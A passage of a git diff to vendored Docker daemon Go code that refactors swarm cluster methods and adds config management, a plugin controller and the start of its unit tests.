} - } - - // retrieve auth config from encoded auth - authConfig := &apitypes.AuthConfig{} - if encodedAuth != "" { - if err := json.NewDecoder(base64.NewDecoder(base64.URLEncoding, strings.NewReader(encodedAuth))).Decode(authConfig); err != nil { - logrus.Warnf("invalid authconfig: %v", err) - } - } - - resp := &apitypes.ServiceUpdateResponse{} - - // pin image by digest - if os.Getenv("DOCKER_SERVICE_PREFER_OFFLINE_IMAGE") != "1" { - digestImage, err := c.imageWithDigestString(ctx, newCtnr.Image, authConfig) - if err != nil { - logrus.Warnf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error()) - resp.Warnings = append(resp.Warnings, fmt.Sprintf("unable to pin image %s to digest: %s", newCtnr.Image, err.Error())) - } else if newCtnr.Image != digestImage { - logrus.Debugf("pinning image %s by digest: %s", newCtnr.Image, digestImage) - newCtnr.Image = digestImage - } else { - logrus.Debugf("updating service using supplied digest reference %s", newCtnr.Image) - } - } - - _, err = c.client.UpdateService( - ctx, - &swarmapi.UpdateServiceRequest{ - ServiceID: currentService.ID, - Spec: &serviceSpec, - ServiceVersion: &swarmapi.Version{ - Index: version, - }, - }, - ) - - return resp, err -} - -// RemoveService removes a service from a managed swarm cluster. -func (c *Cluster) RemoveService(input string) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - service, err := getService(ctx, c.client, input) - if err != nil { - return err - } - - if _, err := c.client.RemoveService(ctx, &swarmapi.RemoveServiceRequest{ServiceID: service.ID}); err != nil { - return err - } - return nil -} - -// ServiceLogs collects service logs and writes them back to `config.OutStream` -func (c *Cluster) ServiceLogs(ctx context.Context, input string, config *backend.ContainerLogsConfig, started chan struct{}) error { - c.RLock() - if !c.isActiveManager() { - c.RUnlock() - return c.errNoManager() - } - - service, err := getService(ctx, c.client, input) - if err != nil { - c.RUnlock() - return err - } - - stream, err := c.logs.SubscribeLogs(ctx, &swarmapi.SubscribeLogsRequest{ - Selector: &swarmapi.LogSelector{ - ServiceIDs: []string{service.ID}, - }, - Options: &swarmapi.LogSubscriptionOptions{ - Follow: config.Follow, - }, - }) - if err != nil { - c.RUnlock() - return err - } - - wf := ioutils.NewWriteFlusher(config.OutStream) - defer wf.Close() - close(started) - wf.Flush() - - outStream := stdcopy.NewStdWriter(wf, stdcopy.Stdout) - errStream := stdcopy.NewStdWriter(wf, stdcopy.Stderr) - - // Release the lock before starting the stream. - c.RUnlock() - for { - // Check the context before doing anything. - select { - case <-ctx.Done(): - return ctx.Err() - default: - } - - subscribeMsg, err := stream.Recv() - if err == io.EOF { - return nil - } - if err != nil { - return err - } - - for _, msg := range subscribeMsg.Messages { - data := []byte{} - - if config.Timestamps { - ts, err := ptypes.Timestamp(msg.Timestamp) - if err != nil { - return err - } - data = append(data, []byte(ts.Format(logger.TimeFormat)+" ")...) - } - - data = append(data, []byte(fmt.Sprintf("%s.node.id=%s,%s.service.id=%s,%s.task.id=%s ", - contextPrefix, msg.Context.NodeID, - contextPrefix, msg.Context.ServiceID, - contextPrefix, msg.Context.TaskID, - ))...) - - data = append(data, msg.Data...) - - switch msg.Stream { - case swarmapi.LogStreamStdout: - outStream.Write(data) - case swarmapi.LogStreamStderr: - errStream.Write(data) - } - } - } -} - -// GetNodes returns a list of all nodes known to a cluster. -func (c *Cluster) GetNodes(options apitypes.NodeListOptions) ([]types.Node, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - filters, err := newListNodesFilters(options.Filters) - if err != nil { - return nil, err - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListNodes( - ctx, - &swarmapi.ListNodesRequest{Filters: filters}) - if err != nil { - return nil, err - } - - nodes := []types.Node{} - - for _, node := range r.Nodes { - nodes = append(nodes, convert.NodeFromGRPC(*node)) - } - return nodes, nil -} - -// GetNode returns a node based on an ID or name. -func (c *Cluster) GetNode(input string) (types.Node, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Node{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - node, err := getNode(ctx, c.client, input) - if err != nil { - return types.Node{}, err - } - return convert.NodeFromGRPC(*node), nil -} - -// UpdateNode updates existing nodes properties. -func (c *Cluster) UpdateNode(input string, version uint64, spec types.NodeSpec) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - nodeSpec, err := convert.NodeSpecToGRPC(spec) - if err != nil { - return err - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - currentNode, err := getNode(ctx, c.client, input) - if err != nil { - return err - } - - _, err = c.client.UpdateNode( - ctx, - &swarmapi.UpdateNodeRequest{ - NodeID: currentNode.ID, - Spec: &nodeSpec, - NodeVersion: &swarmapi.Version{ - Index: version, - }, - }, - ) - return err -} - -// RemoveNode removes a node from a cluster -func (c *Cluster) RemoveNode(input string, force bool) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - node, err := getNode(ctx, c.client, input) - if err != nil { - return err - } - - if _, err := c.client.RemoveNode(ctx, &swarmapi.RemoveNodeRequest{NodeID: node.ID, Force: force}); err != nil { - return err - } - return nil -} - -// GetTasks returns a list of tasks matching the filter options. -func (c *Cluster) GetTasks(options apitypes.TaskListOptions) ([]types.Task, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - byName := func(filter filters.Args) error { - if filter.Include("service") { - serviceFilters := filter.Get("service") - for _, serviceFilter := range serviceFilters { - service, err := c.GetService(serviceFilter) - if err != nil { - return err - } - filter.Del("service", serviceFilter) - filter.Add("service", service.ID) - } - } - if filter.Include("node") { - nodeFilters := filter.Get("node") - for _, nodeFilter := range nodeFilters { - node, err := c.GetNode(nodeFilter) - if err != nil { - return err - } - filter.Del("node", nodeFilter) - filter.Add("node", node.ID) - } - } - return nil - } - - filters, err := newListTasksFilters(options.Filters, byName) - if err != nil { - return nil, err - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListTasks( - ctx, - &swarmapi.ListTasksRequest{Filters: filters}) - if err != nil { - return nil, err - } - - tasks := []types.Task{} - - for _, task := range r.Tasks { - if task.Spec.GetContainer() != nil { - tasks = append(tasks, convert.TaskFromGRPC(*task)) - } - } - return tasks, nil -} - -// GetTask returns a task by an ID. -func (c *Cluster) GetTask(input string) (types.Task, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return types.Task{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - task, err := getTask(ctx, c.client, input) - if err != nil { - return types.Task{}, err - } - return convert.TaskFromGRPC(*task), nil -} - -// GetNetwork returns a cluster network by an ID. -func (c *Cluster) GetNetwork(input string) (apitypes.NetworkResource, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return apitypes.NetworkResource{}, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - network, err := getNetwork(ctx, c.client, input) - if err != nil { - return apitypes.NetworkResource{}, err - } - return convert.BasicNetworkFromGRPC(*network), nil -} - -func (c *Cluster) getNetworks(filters *swarmapi.ListNetworksRequest_Filters) ([]apitypes.NetworkResource, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return nil, c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - r, err := c.client.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: filters}) - if err != nil { - return nil, err - } - - var networks []apitypes.NetworkResource - - for _, network := range r.Networks { - networks = append(networks, convert.BasicNetworkFromGRPC(*network)) - } - - return networks, nil -} - -// GetNetworks returns all current cluster managed networks. -func (c *Cluster) GetNetworks() ([]apitypes.NetworkResource, error) { - return c.getNetworks(nil) -} - -// GetNetworksByName returns cluster managed networks by name. -// It is ok to have multiple networks here. #18864 -func (c *Cluster) GetNetworksByName(name string) ([]apitypes.NetworkResource, error) { - // Note that swarmapi.GetNetworkRequest.Name is not functional. - // So we cannot just use that with c.GetNetwork. - return c.getNetworks(&swarmapi.ListNetworksRequest_Filters{ - Names: []string{name}, - }) -} - -func attacherKey(target, containerID string) string { - return containerID + ":" + target -} - -// UpdateAttachment signals the attachment config to the attachment -// waiter who is trying to start or attach the container to the -// network. -func (c *Cluster) UpdateAttachment(target, containerID string, config *network.NetworkingConfig) error { - c.RLock() - attacher, ok := c.attachers[attacherKey(target, containerID)] - c.RUnlock() - if !ok || attacher == nil { - return fmt.Errorf("could not find attacher for container %s to network %s", containerID, target) - } - - attacher.attachWaitCh <- config - close(attacher.attachWaitCh) - return nil -} - -// WaitForDetachment waits for the container to stop or detach from -// the network. -func (c *Cluster) WaitForDetachment(ctx context.Context, networkName, networkID, taskID, containerID string) error { - c.RLock() - attacher, ok := c.attachers[attacherKey(networkName, containerID)] - if !ok { - attacher, ok = c.attachers[attacherKey(networkID, containerID)] - } - if c.node == nil || c.node.Agent() == nil { - c.RUnlock() - return fmt.Errorf("invalid cluster node while waiting for detachment") - } - - agent := c.node.Agent() - c.RUnlock() - - if ok && attacher != nil && - attacher.detachWaitCh != nil && - attacher.attachCompleteCh != nil { - // Attachment may be in progress still so wait for - // attachment to complete. - select { - case <-attacher.attachCompleteCh: - case <-ctx.Done(): - return ctx.Err() - } - - if attacher.taskID == taskID { - select { - case <-attacher.detachWaitCh: - case <-ctx.Done(): - return ctx.Err() - } - } - } - - return agent.ResourceAllocator().DetachNetwork(ctx, taskID) -} - -// AttachNetwork generates an attachment request towards the manager. -func (c *Cluster) AttachNetwork(target string, containerID string, addresses []string) (*network.NetworkingConfig, error) { - aKey := attacherKey(target, containerID) - c.Lock() - if c.node == nil || c.node.Agent() == nil { - c.Unlock() - return nil, fmt.Errorf("invalid cluster node while attaching to network") - } - if attacher, ok := c.attachers[aKey]; ok { - c.Unlock() - return attacher.config, nil - } - - agent := c.node.Agent() - attachWaitCh := make(chan *network.NetworkingConfig) - detachWaitCh := make(chan struct{}) - attachCompleteCh := make(chan struct{}) - c.attachers[aKey] = &attacher{ - attachWaitCh: attachWaitCh, - attachCompleteCh: attachCompleteCh, - detachWaitCh: detachWaitCh, - } - c.Unlock() - - ctx, cancel := c.getRequestContext() - defer cancel() - - taskID, err := agent.ResourceAllocator().AttachNetwork(ctx, containerID, target, addresses) - if err != nil { - c.Lock() - delete(c.attachers, aKey) - c.Unlock() - return nil, fmt.Errorf("Could not attach to network %s: %v", target, err) - } - - c.Lock() - c.attachers[aKey].taskID = taskID - close(attachCompleteCh) - c.Unlock() - - logrus.Debugf("Successfully attached to network %s with tid %s", target, taskID) - - var config *network.NetworkingConfig - select { - case config = <-attachWaitCh: - case <-ctx.Done(): - return nil, fmt.Errorf("attaching to network failed, make sure your network options are correct and check manager logs: %v", ctx.Err()) - } - - c.Lock() - c.attachers[aKey].config = config - c.Unlock() - return config, nil -} - -// DetachNetwork unblocks the waiters waiting on WaitForDetachment so -// that a request to detach can be generated towards the manager. -func (c *Cluster) DetachNetwork(target string, containerID string) error { - aKey := attacherKey(target, containerID) - - c.Lock() - attacher, ok := c.attachers[aKey] - delete(c.attachers, aKey) - c.Unlock() - - if !ok { - return fmt.Errorf("could not find network attachment for container %s to network %s", containerID, target) - } - - close(attacher.detachWaitCh) - return nil -} - -// CreateNetwork creates a new cluster managed network. -func (c *Cluster) CreateNetwork(s apitypes.NetworkCreateRequest) (string, error) { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return "", c.errNoManager() - } - - if runconfig.IsPreDefinedNetwork(s.Name) { - err := fmt.Errorf("%s is a pre-defined network and cannot be created", s.Name) - return "", apierrors.NewRequestForbiddenError(err) - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - networkSpec := convert.BasicNetworkCreateToGRPC(s) - r, err := c.client.CreateNetwork(ctx, &swarmapi.CreateNetworkRequest{Spec: &networkSpec}) - if err != nil { - return "", err - } - - return r.Network.ID, nil -} - -// RemoveNetwork removes a cluster network. -func (c *Cluster) RemoveNetwork(input string) error { - c.RLock() - defer c.RUnlock() - - if !c.isActiveManager() { - return c.errNoManager() - } - - ctx, cancel := c.getRequestContext() - defer cancel() - - network, err := getNetwork(ctx, c.client, input) - if err != nil { - return err - } - - if _, err := c.client.RemoveNetwork(ctx, &swarmapi.RemoveNetworkRequest{NetworkID: network.ID}); err != nil { - return err - } - return nil -} - -func (c *Cluster) populateNetworkID(ctx context.Context, client swarmapi.ControlClient, s *types.ServiceSpec) error { - // Always prefer NetworkAttachmentConfigs from TaskTemplate - // but fallback to service spec for backward compatibility - networks := s.TaskTemplate.Networks - if len(networks) == 0 { - networks = s.Networks - } - - for i, n := range networks { - apiNetwork, err := getNetwork(ctx, client, n.Target) - if err != nil { - if ln, _ := c.config.Backend.FindNetwork(n.Target); ln != nil && !ln.Info().Dynamic() { - err = fmt.Errorf("The network %s cannot be used with services. Only networks scoped to the swarm can be used, such as those created with the overlay driver.", ln.Name()) - return apierrors.NewRequestForbiddenError(err) - } - return err - } - networks[i].Target = apiNetwork.ID - } - return nil -} - -func getNetwork(ctx context.Context, c swarmapi.ControlClient, input string) (*swarmapi.Network, error) { - // GetNetwork to match via full ID. - rg, err := c.GetNetwork(ctx, &swarmapi.GetNetworkRequest{NetworkID: input}) - if err != nil { - // If any error (including NotFound), ListNetworks to match via ID prefix and full name. - rl, err := c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{Names: []string{input}}}) - if err != nil || len(rl.Networks) == 0 { - rl, err = c.ListNetworks(ctx, &swarmapi.ListNetworksRequest{Filters: &swarmapi.ListNetworksRequest_Filters{IDPrefixes: []string{input}}}) - } - - if err != nil { - return nil, err - } - - if len(rl.Networks) == 0 { - return nil, fmt.Errorf("network %s not found", input) - } - - if l := len(rl.Networks); l > 1 { - return nil, fmt.Errorf("network %s is ambiguous (%d matches found)", input, l) - } - - return rl.Networks[0], nil - } - return rg.Network, nil -} - -// Cleanup stops active swarm node. This is run before daemon shutdown. -func (c *Cluster) Cleanup() { - c.Lock() - node := c.node - if node == nil { - c.Unlock() - return - } - defer c.Unlock() - if c.isActiveManager() { - active, reachable, unreachable, err := c.managerStats() - if err == nil { - singlenode := active && isLastManager(reachable, unreachable) - if active && !singlenode && removingManagerCausesLossOfQuorum(reachable, unreachable) { - logrus.Errorf("Leaving cluster with %v managers left out of %v. Raft quorum will be lost.", reachable-1, reachable+unreachable) - } - } - } - c.stopNode() -} - -func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, err error) { +func managerStats(client swarmapi.ControlClient, currentNodeID string) (current bool, reachable int, unreachable int, err error) { ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) defer cancel() - nodes, err := c.client.ListNodes(ctx, &swarmapi.ListNodesRequest{}) + nodes, err := client.ListNodes(ctx, &swarmapi.ListNodesRequest{}) if err != nil { return false, 0, 0, err } @@ -1860,7 +405,7 @@ func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, if n.ManagerStatus != nil { if n.ManagerStatus.Reachability == swarmapi.RaftMemberStatus_REACHABLE { reachable++ - if n.ID == c.node.NodeID() { + if n.ID == currentNodeID { current = true } } @@ -1872,102 +417,34 @@ func (c *Cluster) managerStats() (current bool, reachable int, unreachable int, return } -func validateAndSanitizeInitRequest(req *types.InitRequest) error { - var err error - req.ListenAddr, err = validateAddr(req.ListenAddr) - if err != nil { - return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) - } - - if req.Spec.Annotations.Name == "" { - req.Spec.Annotations.Name = "default" - } else if req.Spec.Annotations.Name != "default" { - return errors.New(`swarm spec must be named "default"`) +func detectLockedError(err error) error { + if err == swarmnode.ErrInvalidUnlockKey { + return errors.WithStack(errSwarmLocked) } - - return nil + return err } -func validateAndSanitizeJoinRequest(req *types.JoinRequest) error { - var err error - req.ListenAddr, err = validateAddr(req.ListenAddr) - if err != nil { - return fmt.Errorf("invalid ListenAddr %q: %v", req.ListenAddr, err) - } - if len(req.RemoteAddrs) == 0 { - return fmt.Errorf("at least 1 RemoteAddr is required to join") - } - for i := range req.RemoteAddrs { - req.RemoteAddrs[i], err = validateAddr(req.RemoteAddrs[i]) - if err != nil { - return fmt.Errorf("invalid remoteAddr %q: %v", req.RemoteAddrs[i], err) - } - } - return nil -} +func (c *Cluster) lockedManagerAction(fn func(ctx context.Context, state nodeState) error) error { + c.mu.RLock() + defer c.mu.RUnlock() -func validateAddr(addr string) (string, error) { - if addr == "" { - return addr, fmt.Errorf("invalid empty address") - } - newaddr, err := opts.ParseTCPAddr(addr, defaultAddr) - if err != nil { - return addr, nil + state := c.currentNodeState() + if !state.IsActiveManager() { + return c.errNoManager(state) } - return strings.TrimPrefix(newaddr, "tcp://"), nil -} -func initClusterSpec(node *node, spec types.Spec) error { - ctx, _ := context.WithTimeout(context.Background(), 5*time.Second) - for conn := range node.ListenControlSocket(ctx) { - if ctx.Err() != nil { - return ctx.Err() - } - if conn != nil { - client := swarmapi.NewControlClient(conn) - var cluster *swarmapi.Cluster - for i := 0; ; i++ { - lcr, err := client.ListClusters(ctx, &swarmapi.ListClustersRequest{}) - if err != nil { - return fmt.Errorf("error on listing clusters: %v", err) - } - if len(lcr.Clusters) == 0 { - if i < 10 { - time.Sleep(200 * time.Millisecond) - continue - } - return fmt.Errorf("empty list of clusters was returned") - } - cluster = lcr.Clusters[0] - break - } - // In init, we take the initial default values from swarmkit, and merge - // any non nil or 0 value from spec to GRPC spec. This will leave the - // default value alone. - // Note that this is different from Update(), as in Update() we expect - // user to specify the complete spec of the cluster (as they already know - // the existing one and knows which field to update) - clusterSpec, err := convert.MergeSwarmSpecToGRPC(spec, cluster.Spec) - if err != nil { - return fmt.Errorf("error updating cluster settings: %v", err) - } - _, err = client.UpdateCluster(ctx, &swarmapi.UpdateClusterRequest{ - ClusterID: cluster.ID, - ClusterVersion: &cluster.Meta.Version, - Spec: &clusterSpec, - }) - if err != nil { - return fmt.Errorf("error updating cluster settings: %v", err) - } - return nil - } - } - return ctx.Err() + ctx, cancel := c.getRequestContext() + defer cancel() + + return fn(ctx, state) } -func detectLockedError(err error) error { - if err == swarmnode.ErrInvalidUnlockKey { - return errors.WithStack(ErrSwarmLocked) - } - return err +// SendClusterEvent allows to send cluster events on the configEvent channel +// TODO This method should not be exposed. +// Currently it is used to notify the network controller that the keys are +// available +func (c *Cluster) SendClusterEvent(event lncluster.ConfigEventType) { + c.mu.RLock() + defer c.mu.RUnlock() + c.configEvent <- event } diff --git a/vendor/github.com/docker/docker/daemon/cluster/configs.go b/vendor/github.com/docker/docker/daemon/cluster/configs.go new file mode 100644 index 0000000000..6b373e618b --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/configs.go @@ -0,0 +1,118 @@ +package cluster // import "github.com/docker/docker/daemon/cluster" + +import ( + "context" + + apitypes "github.com/docker/docker/api/types" + types "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/daemon/cluster/convert" + swarmapi "github.com/docker/swarmkit/api" +) + +// GetConfig returns a config from a managed swarm cluster +func (c *Cluster) GetConfig(input string) (types.Config, error) { + var config *swarmapi.Config + + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + s, err := getConfig(ctx, state.controlClient, input) + if err != nil { + return err + } + config = s + return nil + }); err != nil { + return types.Config{}, err + } + return convert.ConfigFromGRPC(config), nil +} + +// GetConfigs returns all configs of a managed swarm cluster. +func (c *Cluster) GetConfigs(options apitypes.ConfigListOptions) ([]types.Config, error) { + c.mu.RLock() + defer c.mu.RUnlock() + + state := c.currentNodeState() + if !state.IsActiveManager() { + return nil, c.errNoManager(state) + } + + filters, err := newListConfigsFilters(options.Filters) + if err != nil { + return nil, err + } + ctx, cancel := c.getRequestContext() + defer cancel() + + r, err := state.controlClient.ListConfigs(ctx, + &swarmapi.ListConfigsRequest{Filters: filters}) + if err != nil { + return nil, err + } + + configs := []types.Config{} + + for _, config := range r.Configs { + configs = append(configs, convert.ConfigFromGRPC(config)) + } + + return configs, nil +} + +// CreateConfig creates a new config in a managed swarm cluster. +func (c *Cluster) CreateConfig(s types.ConfigSpec) (string, error) { + var resp *swarmapi.CreateConfigResponse + if err := c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + configSpec := convert.ConfigSpecToGRPC(s) + + r, err := state.controlClient.CreateConfig(ctx, + &swarmapi.CreateConfigRequest{Spec: &configSpec}) + if err != nil { + return err + } + resp = r + return nil + }); err != nil { + return "", err + } + return resp.Config.ID, nil +} + +// RemoveConfig removes a config from a managed swarm cluster. +func (c *Cluster) RemoveConfig(input string) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + config, err := getConfig(ctx, state.controlClient, input) + if err != nil { + return err + } + + req := &swarmapi.RemoveConfigRequest{ + ConfigID: config.ID, + } + + _, err = state.controlClient.RemoveConfig(ctx, req) + return err + }) +} + +// UpdateConfig updates a config in a managed swarm cluster. +// Note: this is not exposed to the CLI but is available from the API only +func (c *Cluster) UpdateConfig(input string, version uint64, spec types.ConfigSpec) error { + return c.lockedManagerAction(func(ctx context.Context, state nodeState) error { + config, err := getConfig(ctx, state.controlClient, input) + if err != nil { + return err + } + + configSpec := convert.ConfigSpecToGRPC(spec) + + _, err = state.controlClient.UpdateConfig(ctx, + &swarmapi.UpdateConfigRequest{ + ConfigID: config.ID, + ConfigVersion: &swarmapi.Version{ + Index: version, + }, + Spec: &configSpec, + }) + return err + }) +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go new file mode 100644 index 0000000000..6d7606aa84 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller.go @@ -0,0 +1,261 @@ +package plugin // import "github.com/docker/docker/daemon/cluster/controllers/plugin" + +import ( + "context" + "io" + "io/ioutil" + "net/http" + + "github.com/docker/distribution/reference" + enginetypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm/runtime" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/plugin" + "github.com/docker/docker/plugin/v2" + "github.com/docker/swarmkit/api" + "github.com/gogo/protobuf/proto" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" +) + +// Controller is the controller for the plugin backend. +// Plugins are managed as a singleton object with a desired state (different from containers). +// With the plugin controller instead of having a strict create->start->stop->remove +// task lifecycle like containers, we manage the desired state of the plugin and let +// the plugin manager do what it already does and monitor the plugin. +// We'll also end up with many tasks all pointing to the same plugin ID. +// +// TODO(@cpuguy83): registry auth is intentionally not supported until we work out +// the right way to pass registry credentials via secrets. +type Controller struct { + backend Backend + spec runtime.PluginSpec + logger *logrus.Entry + + pluginID string + serviceID string + taskID string + + // hook used to signal tests that `Wait()` is actually ready and waiting + signalWaitReady func() +} + +// Backend is the interface for interacting with the plugin manager +// Controller actions are passed to the configured backend to do the real work. +type Backend interface { + Disable(name string, config *enginetypes.PluginDisableConfig) error + Enable(name string, config *enginetypes.PluginEnableConfig) error + Remove(name string, config *enginetypes.PluginRmConfig) error + Pull(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer, opts ...plugin.CreateOpt) error + Upgrade(ctx context.Context, ref reference.Named, name string, metaHeaders http.Header, authConfig *enginetypes.AuthConfig, privileges enginetypes.PluginPrivileges, outStream io.Writer) error + Get(name string) (*v2.Plugin, error) + SubscribeEvents(buffer int, events ...plugin.Event) (eventCh <-chan interface{}, cancel func()) +} + +// NewController returns a new cluster plugin controller +func NewController(backend Backend, t *api.Task) (*Controller, error) { + spec, err := readSpec(t) + if err != nil { + return nil, err + } + return &Controller{ + backend: backend, + spec: spec, + serviceID: t.ServiceID, + logger: logrus.WithFields(logrus.Fields{ + "controller": "plugin", + "task": t.ID, + "plugin": spec.Name, + })}, nil +} + +func readSpec(t *api.Task) (runtime.PluginSpec, error) { + var cfg runtime.PluginSpec + + generic := t.Spec.GetGeneric() + if err := proto.Unmarshal(generic.Payload.Value, &cfg); err != nil { + return cfg, errors.Wrap(err, "error reading plugin spec") + } + return cfg, nil +} + +// Update is the update phase from swarmkit +func (p *Controller) Update(ctx context.Context, t *api.Task) error { + p.logger.Debug("Update") + return nil +} + +// Prepare is the prepare phase from swarmkit +func (p *Controller) Prepare(ctx context.Context) (err error) { + p.logger.Debug("Prepare") + + remote, err := reference.ParseNormalizedNamed(p.spec.Remote) + if err != nil { + return errors.Wrapf(err, "error parsing remote reference %q", p.spec.Remote) + } + + if p.spec.Name == "" { + p.spec.Name = remote.String() + } + + var authConfig enginetypes.AuthConfig + privs := convertPrivileges(p.spec.Privileges) + + pl, err := p.backend.Get(p.spec.Name) + + defer func() { + if pl != nil && err == nil { + pl.Acquire() + } + }() + + if err == nil && pl != nil { + if pl.SwarmServiceID != p.serviceID { + return errors.Errorf("plugin already exists: %s", p.spec.Name) + } + if pl.IsEnabled() { + if err := p.backend.Disable(pl.GetID(), &enginetypes.PluginDisableConfig{ForceDisable: true}); err != nil { + p.logger.WithError(err).Debug("could not disable plugin before running upgrade") + } + } + p.pluginID = pl.GetID() + return p.backend.Upgrade(ctx, remote, p.spec.Name, nil, &authConfig, privs, ioutil.Discard) + } + + if err := p.backend.Pull(ctx, remote, p.spec.Name, nil, &authConfig, privs, ioutil.Discard, plugin.WithSwarmService(p.serviceID)); err != nil { + return err + } + pl, err = p.backend.Get(p.spec.Name) + if err != nil { + return err + } + p.pluginID = pl.GetID() + + return nil +} + +// Start is the start phase from swarmkit +func (p *Controller) Start(ctx context.Context) error { + p.logger.Debug("Start") + + pl, err := p.backend.Get(p.pluginID) + if err != nil { + return err + } + + if p.spec.Disabled { + if pl.IsEnabled() { + return p.backend.Disable(p.pluginID, &enginetypes.PluginDisableConfig{ForceDisable: false}) + } + return nil + } + if !pl.IsEnabled() { + return p.backend.Enable(p.pluginID, &enginetypes.PluginEnableConfig{Timeout: 30}) + } + return nil +} + +// Wait causes the task to wait until returned +func (p *Controller) Wait(ctx context.Context) error { + p.logger.Debug("Wait") + + pl, err := p.backend.Get(p.pluginID) + if err != nil { + return err + } + + events, cancel := p.backend.SubscribeEvents(1, plugin.EventDisable{Plugin: pl.PluginObj}, plugin.EventRemove{Plugin: pl.PluginObj}, plugin.EventEnable{Plugin: pl.PluginObj}) + defer cancel() + + if p.signalWaitReady != nil { + p.signalWaitReady() + } + + if !p.spec.Disabled != pl.IsEnabled() { + return errors.New("mismatched plugin state") + } + + for { + select { + case <-ctx.Done(): + return ctx.Err() + case e := <-events: + p.logger.Debugf("got event %#T", e) + + switch e.(type) { + case plugin.EventEnable: + if p.spec.Disabled { + return errors.New("plugin enabled") + } + case plugin.EventRemove: + return errors.New("plugin removed") + case plugin.EventDisable: + if !p.spec.Disabled { + return errors.New("plugin disabled") + } + } + } + } +} + +func isNotFound(err error) bool { + return errdefs.IsNotFound(err) +} + +// Shutdown is the shutdown phase from swarmkit +func (p *Controller) Shutdown(ctx context.Context) error { + p.logger.Debug("Shutdown") + return nil +} + +// Terminate is the terminate phase from swarmkit +func (p *Controller) Terminate(ctx context.Context) error { + p.logger.Debug("Terminate") + return nil +} + +// Remove is the remove phase from swarmkit +func (p *Controller) Remove(ctx context.Context) error { + p.logger.Debug("Remove") + + pl, err := p.backend.Get(p.pluginID) + if err != nil { + if isNotFound(err) { + return nil + } + return err + } + + pl.Release() + if pl.GetRefCount() > 0 { + p.logger.Debug("skipping remove due to ref count") + return nil + } + + // This may error because we have exactly 1 plugin, but potentially multiple + // tasks which are calling remove. + err = p.backend.Remove(p.pluginID, &enginetypes.PluginRmConfig{ForceRemove: true}) + if isNotFound(err) { + return nil + } + return err +} + +// Close is the close phase from swarmkit +func (p *Controller) Close() error { + p.logger.Debug("Close") + return nil +} + +func convertPrivileges(ls []*runtime.PluginPrivilege) enginetypes.PluginPrivileges { + var out enginetypes.PluginPrivileges + for _, p := range ls { + pp := enginetypes.PluginPrivilege{ + Name: p.Name, + Description: p.Description, + Value: p.Value, + } + out = append(out, pp) + } + return out +} diff --git a/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go new file mode 100644 index 0000000000..8329d44766 --- /dev/null +++ b/vendor/github.com/docker/docker/daemon/cluster/controllers/plugin/controller_test.go @@ -0,0 +1,390 @@ +package plugin // import "github.com/docker/docker/daemon/cluster/controllers/plugin" + +import ( + "context" + "errors" + "io" + "io/ioutil" + "net/http" + "strings" + "testing" + "time" + + "github.com/docker/distribution/reference" + enginetypes "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/swarm/runtime" + "github.com/docker/docker/pkg/pubsub" + "github.com/docker/docker/plugin" + "github.com/docker/docker/plugin/v2" + "github.com/sirupsen/logrus" +) + +const ( + pluginTestName = "test" + pluginTestRemote = "testremote" + pluginTestRemoteUpgrade = "testremote2" +) + +func TestPrepare(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := context.Background() + + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + + if b.p == nil { + t.Fatal("pull not performed") + } + + c = newTestController(b, false) + if err := c.Prepare(ctx); err != nil { + t.Fatal(err) + } + if b.p == nil { + t.Fatal("unexpected nil") + } + if b.p.PluginObj.PluginReference != pluginTestRemoteUpgrade { + t.Fatal("upgrade not performed") + } + + c = newTestController(b, false) + c.serviceID = "1" + if err := c.Prepare(ctx); err == nil { + t.Fatal("expected error on prepare") + } +} + +func TestStart(t *testing.T) { + b := newMockBackend() + c := newTestController(b, false) + ctx := 